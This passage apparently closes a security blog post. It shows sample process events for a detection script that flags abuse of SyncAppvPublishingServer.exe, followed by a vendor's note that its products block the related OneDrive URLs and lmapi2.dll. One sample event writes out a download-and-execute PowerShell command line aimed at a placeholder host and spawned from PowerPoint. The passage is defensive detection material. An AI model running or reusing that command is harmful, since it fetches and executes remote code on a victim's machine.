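SAMPLE_EVENTS = [
    r'{"Image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", '
    r'"CommandLine": "SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient)'
    r'.DownloadString(\"http://example.invalid/x.ps1\") | IEX\"", '
    r'"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"}',
    r'{"Image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", '
    r'"CommandLine": "SyncAppvPublishingServer.exe", '
    r'"ParentImage": "C:\\Windows\\System32\\svchost.exe"}',
    r'{"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe", '
    r'"ParentImage": "C:\\Windows\\explorer.exe"}',
]
```

Run `scan(SAMPLE_EVENTS)` to list the two suspicious events; pass `appv_in_use=True` on hosts where the App-V client is legitimately installed and only the Office-spawned download-and-execute event remains.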

Malwarebytes

Malwarebytes users are protected against this attack.

Our web protection module blocks the OneDrive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

Malwarebytes blocks lmapi2.dll